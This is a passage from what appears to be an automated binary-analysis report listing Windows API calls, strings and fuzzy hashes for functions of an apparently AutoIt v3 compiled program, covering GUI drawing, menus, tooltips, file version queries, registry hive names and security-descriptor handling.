                        • Opcode Fuzzy Hash: 1facb86b22f4d039384a6899940c3473eb6da42f65c336075856bda34f143327
                        • Instruction Fuzzy Hash: 5F811770600659AACB20BB65CC92FBE7778FF16304F044039FA45EA192FB70DE65C692
                        APIs
                        • GetSysColor.USER32(00000012), ref: 0094AB99
                        • SetTextColor.GDI32(?,?), ref: 0094AB9D
                        • GetSysColorBrush.USER32(0000000F), ref: 0094ABB3
                        • GetSysColor.USER32(0000000F), ref: 0094ABBE
                        • CreateSolidBrush.GDI32(?), ref: 0094ABC3
                        • GetSysColor.USER32(00000011), ref: 0094ABDB
                        • CreatePen.GDI32(00000000,00000001,00743C00), ref: 0094ABE9
                        • SelectObject.GDI32(?,00000000), ref: 0094ABFA
                        • SetBkColor.GDI32(?,00000000), ref: 0094AC03
                        • SelectObject.GDI32(?,?), ref: 0094AC10
                        • InflateRect.USER32(?,000000FF,000000FF), ref: 0094AC2F
                        • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0094AC46
                        • GetWindowLongW.USER32(00000000,000000F0), ref: 0094AC5B
                        • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0094ACA7
                        • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0094ACCE
                        • InflateRect.USER32(?,000000FD,000000FD), ref: 0094ACEC
                        • DrawFocusRect.USER32(?,?), ref: 0094ACF7
                        • GetSysColor.USER32(00000011), ref: 0094AD05
                        • SetTextColor.GDI32(?,00000000), ref: 0094AD0D
                        • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 0094AD21
                        • SelectObject.GDI32(?,0094A869), ref: 0094AD38
                        • DeleteObject.GDI32(?), ref: 0094AD43
                        • SelectObject.GDI32(?,?), ref: 0094AD49
                        • DeleteObject.GDI32(?), ref: 0094AD4E
                        • SetTextColor.GDI32(?,?), ref: 0094AD54
                        • SetBkColor.GDI32(?,?), ref: 0094AD5E
                        Similarity
                        • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                        • String ID:
                        • API String ID: 1996641542-0
                        • Opcode ID: 65a8f5e8b523953d727a7b386e0675d9c041a17a3ed96a29f618a254574d219d
                        • Instruction ID: 760a04a9c055f7741323d719c60745ec208f6b1748c9400875ea094c2305b740
                        • Opcode Fuzzy Hash: 65a8f5e8b523953d727a7b386e0675d9c041a17a3ed96a29f618a254574d219d
                        • Instruction Fuzzy Hash: BA619B75904209EFDF119FA8DC48EAE7BB9FB09320F118125F911AB2A1D7759D40EF90
                        APIs
                        • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 00948D34
                        • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00948D45
                        • CharNextW.USER32(0000014E), ref: 00948D74
                        • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00948DB5
                        • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00948DCB
                        • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00948DDC
                        • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 00948DF9
                        • SetWindowTextW.USER32(?,0000014E), ref: 00948E45
                        • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 00948E5B
                        • SendMessageW.USER32(?,00001002,00000000,?), ref: 00948E8C
                        • _memset.LIBCMT ref: 00948EB1
                        • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 00948EFA
                        • _memset.LIBCMT ref: 00948F59
                        • SendMessageW.USER32(?,00001053,000000FF,?), ref: 00948F83
                        • SendMessageW.USER32(?,00001074,?,00000001), ref: 00948FDB
                        • SendMessageW.USER32(?,0000133D,?,?), ref: 00949088
                        • InvalidateRect.USER32(?,00000000,00000001), ref: 009490AA
                        • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 009490F4
                        • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00949121
                        • DrawMenuBar.USER32(?), ref: 00949130
                        • SetWindowTextW.USER32(?,0000014E), ref: 00949158
                        Strings
                        Similarity
                        • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                        • String ID: 0
                        • API String ID: 1073566785-4108050209
                        • Opcode ID: eb8154fae67113c7f92dee1963498583f064361333de9570e84cde57b780b807
                        • Instruction ID: e84c1fd990656123e7de34fdd40d7b8f94229f6ce613b2cfb1f5b1a3ca57f48c
                        • Opcode Fuzzy Hash: eb8154fae67113c7f92dee1963498583f064361333de9570e84cde57b780b807
                        • Instruction Fuzzy Hash: 61E1A07490521AABDF209F64CC88EEF7BBCFF09714F008155F919AA290DB748A85DF61
                        APIs
                        • GetCursorPos.USER32(?), ref: 00944C51
                        • GetDesktopWindow.USER32 ref: 00944C66
                        • GetWindowRect.USER32(00000000), ref: 00944C6D
                        • GetWindowLongW.USER32(?,000000F0), ref: 00944CCF
                        • DestroyWindow.USER32(?), ref: 00944CFB
                        • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00944D24
                        • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00944D42
                        • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 00944D68
                        • SendMessageW.USER32(?,00000421,?,?), ref: 00944D7D
                        • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 00944D90
                        • IsWindowVisible.USER32(?), ref: 00944DB0
                        • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00944DCB
                        • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00944DDF
                        • GetWindowRect.USER32(?,?), ref: 00944DF7
                        • MonitorFromPoint.USER32(?,?,00000002), ref: 00944E1D
                        • GetMonitorInfoW.USER32(00000000,?), ref: 00944E37
                        • CopyRect.USER32(?,?), ref: 00944E4E
                        • SendMessageW.USER32(?,00000412,00000000), ref: 00944EB9
                        Strings
                        Similarity
                        • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                        • String ID: ($0$tooltips_class32
                        • API String ID: 698492251-4156429822
                        • Opcode ID: cc1aaa35f637d589159b501813f2da3d8558c337a9be2a261565c5bfe5541e71
                        • Instruction ID: b4ce1994269de32257aa4b8558274fa9fb3d76842ec9446dd0a58dfc7d65ca61
                        • Opcode Fuzzy Hash: cc1aaa35f637d589159b501813f2da3d8558c337a9be2a261565c5bfe5541e71
                        • Instruction Fuzzy Hash: 23B15B71618341AFDB04DF64C849F6ABBE4FF85714F00891CF599AB2A1DB71E805CB92
                        APIs
                        • GetFileVersionInfoSizeW.VERSION(?,?), ref: 009246E8
                        • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 0092470E
                        • _wcscpy.LIBCMT ref: 0092473C
                        • _wcscmp.LIBCMT ref: 00924747
                        • _wcscat.LIBCMT ref: 0092475D
                        • _wcsstr.LIBCMT ref: 00924768
                        • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 00924784
                        • _wcscat.LIBCMT ref: 009247CD
                        • _wcscat.LIBCMT ref: 009247D4
                        • _wcsncpy.LIBCMT ref: 009247FF
                        Strings
                        Similarity
                        • API ID: _wcscat$FileInfoVersion$QuerySizeValue_wcscmp_wcscpy_wcsncpy_wcsstr
                        • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                        • API String ID: 699586101-1459072770
                        • Opcode ID: 70fd29dfdb1a1ec19c732a4714fc852fcada57d5dfaa6b72112294fc6b7c1206
                        • Instruction ID: e60ad651e67b6f2b7f59680ccf45bf7224d94bd992798a6aa81a6d06bf487dff
                        • Opcode Fuzzy Hash: 70fd29dfdb1a1ec19c732a4714fc852fcada57d5dfaa6b72112294fc6b7c1206
                        • Instruction Fuzzy Hash: 484139326042517ADB10E7799C47EBF77ACEF83710F00416AF905E6182EF74A90196A6
                        APIs
                        • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 008C28BC
                        • GetSystemMetrics.USER32(00000007), ref: 008C28C4
                        • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 008C28EF
                        • GetSystemMetrics.USER32(00000008), ref: 008C28F7
                        • GetSystemMetrics.USER32(00000004), ref: 008C291C
                        • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 008C2939
                        • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 008C2949
                        • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 008C297C
                        • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 008C2990
                        • GetClientRect.USER32(00000000,000000FF), ref: 008C29AE
                        • GetStockObject.GDI32(00000011), ref: 008C29CA
                        • SendMessageW.USER32(00000000,00000030,00000000), ref: 008C29D5
                          • Part of subcall function 008C2344: GetCursorPos.USER32(?), ref: 008C2357
                          • Part of subcall function 008C2344: ScreenToClient.USER32(009867B0,?), ref: 008C2374
                          • Part of subcall function 008C2344: GetAsyncKeyState.USER32(00000001), ref: 008C2399
                          • Part of subcall function 008C2344: GetAsyncKeyState.USER32(00000002), ref: 008C23A7
                        • SetTimer.USER32(00000000,00000000,00000028,008C1256), ref: 008C29FC
                        Strings
                        Similarity
                        • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                        • String ID: AutoIt v3 GUI
                        • API String ID: 1458621304-248962490
                        • Opcode ID: 56056e3b3847ae223a5b6df0e4e0750832d474e9a73f84f1c68f6da983f787b7
                        • Instruction ID: 6b771b84bff0933b29947c281b9d820d1c74bf43dd0c9a23b0730fcb37b578d2
                        • Opcode Fuzzy Hash: 56056e3b3847ae223a5b6df0e4e0750832d474e9a73f84f1c68f6da983f787b7
                        • Instruction Fuzzy Hash: 70B15A75A0420AAFDB14DFA8DD55FAE7BB4FB08314F108229FA15EA2D0DB74E940DB50
                        APIs
                        • CharUpperBuffW.USER32(?,?), ref: 009440F6
                        • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 009441B6
                        Strings
                        Similarity
                        • API ID: BuffCharMessageSendUpper
                        • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                        • API String ID: 3974292440-719923060
                        • Opcode ID: 77d3a2215a57da6ea47efd733bb3cbb3f555baf14f8a8d72803421128b86ea7f
                        • Instruction ID: ad7f6041fa0b8659c038365c9ff280a3072666c8155663c803948a635a6df911
                        • Opcode Fuzzy Hash: 77d3a2215a57da6ea47efd733bb3cbb3f555baf14f8a8d72803421128b86ea7f
                        • Instruction Fuzzy Hash: E7A18B302143059BCB14EF24C955F6AB3E5FF85324F14896CF8AA9B292DB74EC45CB52
                        APIs
                        • LoadCursorW.USER32(00000000,00007F89), ref: 00935309
                        • LoadCursorW.USER32(00000000,00007F8A), ref: 00935314
                        • LoadCursorW.USER32(00000000,00007F00), ref: 0093531F
                        • LoadCursorW.USER32(00000000,00007F03), ref: 0093532A
                        • LoadCursorW.USER32(00000000,00007F8B), ref: 00935335
                        • LoadCursorW.USER32(00000000,00007F01), ref: 00935340
                        • LoadCursorW.USER32(00000000,00007F81), ref: 0093534B
                        • LoadCursorW.USER32(00000000,00007F88), ref: 00935356
                        • LoadCursorW.USER32(00000000,00007F80), ref: 00935361
                        • LoadCursorW.USER32(00000000,00007F86), ref: 0093536C
                        • LoadCursorW.USER32(00000000,00007F83), ref: 00935377
                        • LoadCursorW.USER32(00000000,00007F85), ref: 00935382
                        • LoadCursorW.USER32(00000000,00007F82), ref: 0093538D
                        • LoadCursorW.USER32(00000000,00007F84), ref: 00935398
                        • LoadCursorW.USER32(00000000,00007F04), ref: 009353A3
                        • LoadCursorW.USER32(00000000,00007F02), ref: 009353AE
                        • GetCursorInfo.USER32(?), ref: 009353BE
                        • GetLastError.KERNEL32(00000001,00000000), ref: 009353E9
                        Similarity
                        • API ID: Cursor$Load$ErrorInfoLast
                        • String ID:
                        • API String ID: 3215588206-0
                        APIs
                        • GetClassNameW.USER32(?,?,00000100), ref: 0091AAA5
                        • __swprintf.LIBCMT ref: 0091AB46
                        • _wcscmp.LIBCMT ref: 0091AB59
                        • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 0091ABAE
                        • _wcscmp.LIBCMT ref: 0091ABEA
                        • GetClassNameW.USER32(?,?,00000400), ref: 0091AC21
                        • GetDlgCtrlID.USER32(?), ref: 0091AC73
                        • GetWindowRect.USER32(?,?), ref: 0091ACA9
                        • GetParent.USER32(?), ref: 0091ACC7
                        • ScreenToClient.USER32(00000000), ref: 0091ACCE
                        • GetClassNameW.USER32(?,?,00000100), ref: 0091AD48
                        • _wcscmp.LIBCMT ref: 0091AD5C
                        • GetWindowTextW.USER32(?,?,00000400), ref: 0091AD82
                        • _wcscmp.LIBCMT ref: 0091AD96
                          • Part of subcall function 008E386C: _iswctype.LIBCMT ref: 008E3874
                        Strings
                        Similarity
                        • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_iswctype
                        • String ID: %s%u
                        • API String ID: 3744389584-679674701
                        APIs
                        • GetClassNameW.USER32(00000008,?,00000400), ref: 0091B3DB
                        • _wcscmp.LIBCMT ref: 0091B3EC
                        • GetWindowTextW.USER32(00000001,?,00000400), ref: 0091B414
                        • CharUpperBuffW.USER32(?,00000000), ref: 0091B431
                        • _wcscmp.LIBCMT ref: 0091B44F
                        • _wcsstr.LIBCMT ref: 0091B460
                        • GetClassNameW.USER32(00000018,?,00000400), ref: 0091B498
                        • _wcscmp.LIBCMT ref: 0091B4A8
                        • GetWindowTextW.USER32(00000002,?,00000400), ref: 0091B4CF
                        • GetClassNameW.USER32(00000018,?,00000400), ref: 0091B518
                        • _wcscmp.LIBCMT ref: 0091B528
                        • GetClassNameW.USER32(00000010,?,00000400), ref: 0091B550
                        • GetWindowRect.USER32(00000004,?), ref: 0091B5B9
                        Strings
                        Similarity
                        • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                        • String ID: @$ThumbnailClass
                        • API String ID: 1788623398-1539354611
                        APIs
                        Strings
                        Similarity
                        • API ID: __wcsnicmp
                        • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                        • API String ID: 1038674560-1810252412
                        APIs
                        • LoadIconW.USER32(00000063), ref: 0091C4D4
                        • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 0091C4E6
                        • SetWindowTextW.USER32(?,?), ref: 0091C4FD
                        • GetDlgItem.USER32(?,000003EA), ref: 0091C512
                        • SetWindowTextW.USER32(00000000,?), ref: 0091C518
                        • GetDlgItem.USER32(?,000003E9), ref: 0091C528
                        • SetWindowTextW.USER32(00000000,?), ref: 0091C52E
                        • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 0091C54F
                        • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 0091C569
                        • GetWindowRect.USER32(?,?), ref: 0091C572
                        • SetWindowTextW.USER32(?,?), ref: 0091C5DD
                        • GetDesktopWindow.USER32 ref: 0091C5E3
                        • GetWindowRect.USER32(00000000), ref: 0091C5EA
                        • MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 0091C636
                        • GetClientRect.USER32(?,?), ref: 0091C643
                        • PostMessageW.USER32(?,00000005,00000000,00000000), ref: 0091C668
                        • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 0091C693
                        Similarity
                        • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                        • String ID:
                        • API String ID: 3869813825-0
                        APIs
                        • _memset.LIBCMT ref: 0094A4C8
                        • DestroyWindow.USER32(?,?), ref: 0094A542
                          • Part of subcall function 008C7D2C: _memmove.LIBCMT ref: 008C7D66
                        • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 0094A5BC
                        • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 0094A5DE
                        • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0094A5F1
                        • DestroyWindow.USER32(00000000), ref: 0094A613
                        • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,008C0000,00000000), ref: 0094A64A
                        • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0094A663
                        • GetDesktopWindow.USER32 ref: 0094A67C
                        • GetWindowRect.USER32(00000000), ref: 0094A683
                        • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 0094A69B
                        • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 0094A6B3
                          • Part of subcall function 008C25DB: GetWindowLongW.USER32(?,000000EB), ref: 008C25EC
                        Strings
                        Similarity
                        • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
                        • String ID: 0$tooltips_class32
                        • API String ID: 1297703922-3619404913
                        APIs
                          • Part of subcall function 008C2612: GetWindowLongW.USER32(?,000000EB), ref: 008C2623
                        • DragQueryPoint.SHELL32(?,?), ref: 0094C917
                          • Part of subcall function 0094ADF1: ClientToScreen.USER32(?,?), ref: 0094AE1A
                          • Part of subcall function 0094ADF1: GetWindowRect.USER32(?,?), ref: 0094AE90
                          • Part of subcall function 0094ADF1: PtInRect.USER32(?,?,0094C304), ref: 0094AEA0
                        • SendMessageW.USER32(?,000000B0,?,?), ref: 0094C980
                        • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 0094C98B
                        • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 0094C9AE
                        • _wcscat.LIBCMT ref: 0094C9DE
                        • SendMessageW.USER32(?,000000C2,00000001,?), ref: 0094C9F5
                        • SendMessageW.USER32(?,000000B0,?,?), ref: 0094CA0E
                        • SendMessageW.USER32(?,000000B1,?,?), ref: 0094CA25
                        • SendMessageW.USER32(?,000000B1,?,?), ref: 0094CA47
                        • DragFinish.SHELL32(?), ref: 0094CA4E
                        • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 0094CB41
                        Strings
                        Similarity
                        • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
                        • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                        • API String ID: 169749273-3440237614
                        APIs
                        • CharUpperBuffW.USER32(?,?), ref: 009446AB
                        • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 009446F6
                        Strings
                        Similarity
                        • API ID: BuffCharMessageSendUpper
                        • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                        • API String ID: 3974292440-4258414348
                        APIs
                        • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 0094BB6E
                        • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,00949431), ref: 0094BBCA
                        • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0094BC03
                        • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 0094BC46
                        • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0094BC7D
                        • FreeLibrary.KERNEL32(?), ref: 0094BC89
                        • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0094BC99
                        • DestroyIcon.USER32(?,?,?,?,?,00949431), ref: 0094BCA8
                        • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 0094BCC5
                        • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 0094BCD1
                          • Part of subcall function 008E313D: __wcsicmp_l.LIBCMT ref: 008E31C6
                        Strings
                        Similarity
                        • API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
                        • String ID: .dll$.exe$.icl
                        • API String ID: 1212759294-1154884017
                        APIs
                          • Part of subcall function 008C9997: __itow.LIBCMT ref: 008C99C2
                          • Part of subcall function 008C9997: __swprintf.LIBCMT ref: 008C9A0C
                        • CharLowerBuffW.USER32(?,?), ref: 0092A636
                        • GetDriveTypeW.KERNEL32 ref: 0092A683
                        • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0092A6CB
                        • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0092A702
                        • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0092A730
                          • Part of subcall function 008C7D2C: _memmove.LIBCMT ref: 008C7D66
                        Strings
                        Similarity
                        • API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
                        • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                        • API String ID: 2698844021-4113822522
                        APIs
                        • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 0092A47A
                        • __swprintf.LIBCMT ref: 0092A49C
                        • CreateDirectoryW.KERNEL32(?,00000000), ref: 0092A4D9
                        • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 0092A4FE
                        • _memset.LIBCMT ref: 0092A51D
                        • _wcsncpy.LIBCMT ref: 0092A559
                        • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 0092A58E
                        • CloseHandle.KERNEL32(00000000), ref: 0092A599
                        • RemoveDirectoryW.KERNEL32(?), ref: 0092A5A2
                        • CloseHandle.KERNEL32(00000000), ref: 0092A5AC
                        Strings
                        Similarity
                        • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                        • String ID: :$\$\??\%s
                        • API String ID: 2733774712-3457252023
                        APIs
                        • __wsplitpath.LIBCMT ref: 0092DC7B
                        • _wcscat.LIBCMT ref: 0092DC93
                        • _wcscat.LIBCMT ref: 0092DCA5
                        • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 0092DCBA
                        • SetCurrentDirectoryW.KERNEL32(?), ref: 0092DCCE
                        • GetFileAttributesW.KERNEL32(?), ref: 0092DCE6
                        • SetFileAttributesW.KERNEL32(?,00000000), ref: 0092DD00
                        • SetCurrentDirectoryW.KERNEL32(?), ref: 0092DD12
                        Strings
                        Similarity
                        • API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
                        • String ID: *.*
                        • API String ID: 34673085-438819550
                        APIs
                          • Part of subcall function 008C2612: GetWindowLongW.USER32(?,000000EB), ref: 008C2623
                        • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 0094C4EC
                        • GetFocus.USER32 ref: 0094C4FC
                        • GetDlgCtrlID.USER32(00000000), ref: 0094C507
                        • _memset.LIBCMT ref: 0094C632
                        • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 0094C65D
                        • GetMenuItemCount.USER32(?), ref: 0094C67D
                        • GetMenuItemID.USER32(?,00000000), ref: 0094C690
                        • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 0094C6C4
                        • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 0094C70C
                        • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 0094C744
                        • DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 0094C779
                        Strings
                        Similarity
                        • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
                        • String ID: 0
                        • API String ID: 1296962147-4108050209
                        APIs
                          • Part of subcall function 0091874A: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00918766
                          • Part of subcall function 0091874A: GetLastError.KERNEL32(?,0091822A,?,?,?), ref: 00918770
                          • Part of subcall function 0091874A: GetProcessHeap.KERNEL32(00000008,?,?,0091822A,?,?,?), ref: 0091877F
                          • Part of subcall function 0091874A: HeapAlloc.KERNEL32(00000000,?,0091822A,?,?,?), ref: 00918786
                          • Part of subcall function 0091874A: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0091879D
                          • Part of subcall function 009187E7: GetProcessHeap.KERNEL32(00000008,00918240,00000000,00000000,?,00918240,?), ref: 009187F3
                          • Part of subcall function 009187E7: HeapAlloc.KERNEL32(00000000,?,00918240,?), ref: 009187FA
                          • Part of subcall function 009187E7: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00918240,?), ref: 0091880B
                        • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00918458
                        • _memset.LIBCMT ref: 0091846D
                        • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 0091848C
                        • GetLengthSid.ADVAPI32(?), ref: 0091849D
                        • GetAce.ADVAPI32(?,00000000,?), ref: 009184DA
                        • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 009184F6
                        • GetLengthSid.ADVAPI32(?), ref: 00918513
                        • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00918522
                        • HeapAlloc.KERNEL32(00000000), ref: 00918529
                        • GetLengthSid.ADVAPI32(?,00000008,?), ref: 0091854A
                        • CopySid.ADVAPI32(00000000), ref: 00918551
                        • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00918582
                        • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 009185A8
                        • SetUserObjectSecurity.USER32(?,00000004,?), ref: 009185BC
                        Similarity
                        • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                        • String ID:
                        • API String ID: 3996160137-0
                        APIs
                        • GetDC.USER32(00000000), ref: 009376A2
                        • CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 009376AE
                        • CreateCompatibleDC.GDI32(?), ref: 009376BA
                        • SelectObject.GDI32(00000000,?), ref: 009376C7
                        • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 0093771B
                        • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,00000028,00000000), ref: 00937757
                        • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 0093777B
                        • SelectObject.GDI32(00000006,?), ref: 00937783
                        • DeleteObject.GDI32(?), ref: 0093778C
                        • DeleteDC.GDI32(00000006), ref: 00937793
                        • ReleaseDC.USER32(00000000,?), ref: 0093779E
                        Similarity
                        • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                        • String ID: (
                        • API String ID: 2598888154-3887548279
                        APIs
                        • LoadStringW.USER32(00000066,?,00000FFF,0094FB78), ref: 0092A0FC
                          • Part of subcall function 008C7F41: _memmove.LIBCMT ref: 008C7F82
                        • LoadStringW.USER32(?,?,00000FFF,?), ref: 0092A11E
                        • __swprintf.LIBCMT ref: 0092A177
                        • __swprintf.LIBCMT ref: 0092A190
                        • _wprintf.LIBCMT ref: 0092A246
                        • _wprintf.LIBCMT ref: 0092A264
                        Similarity
                        • API ID: LoadString__swprintf_wprintf$_memmove
                        • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                        • API String ID: 311963372-2391861430
                        APIs
                          • Part of subcall function 008E0B9B: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,008C6C6C,?,00008000), ref: 008E0BB7
                          • Part of subcall function 008C48AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,008C48A1,?,?,008C37C0,?), ref: 008C48CE
                        • SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 008C6D0D
                        • SetCurrentDirectoryW.KERNEL32(?), ref: 008C6E5A
                          • Part of subcall function 008C59CD: _wcscpy.LIBCMT ref: 008C5A05
                          • Part of subcall function 008E387D: _iswctype.LIBCMT ref: 008E3885
                        Similarity
                        • API ID: CurrentDirectory$FullNamePath_iswctype_wcscpy
                        • String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                        • API String ID: 537147316-1018226102
                        APIs
                        • _memset.LIBCMT ref: 008C45F9
                        • GetMenuItemCount.USER32(00986890), ref: 008FD7CD
                        • GetMenuItemCount.USER32(00986890), ref: 008FD87D
                        • GetCursorPos.USER32(?), ref: 008FD8C1
                        • SetForegroundWindow.USER32(00000000), ref: 008FD8CA
                        • TrackPopupMenuEx.USER32(00986890,00000000,?,00000000,00000000,00000000), ref: 008FD8DD
                        • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 008FD8E9
                        Similarity
                        • API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow_memset
                        • String ID:
                        • API String ID: 2751501086-0
                        APIs
                        • CharUpperBuffW.USER32(?,?,?,?,?,?,?,00940038,?,?), ref: 009410BC
                        Similarity
                        • API ID: BuffCharUpper
                        • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                        • API String ID: 3964851224-909552448
                        APIs
                          • Part of subcall function 008C7D2C: _memmove.LIBCMT ref: 008C7D66
                          • Part of subcall function 008C7A84: _memmove.LIBCMT ref: 008C7B0D
                        • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 009255D2
                        • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 009255E8
                        • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 009255F9
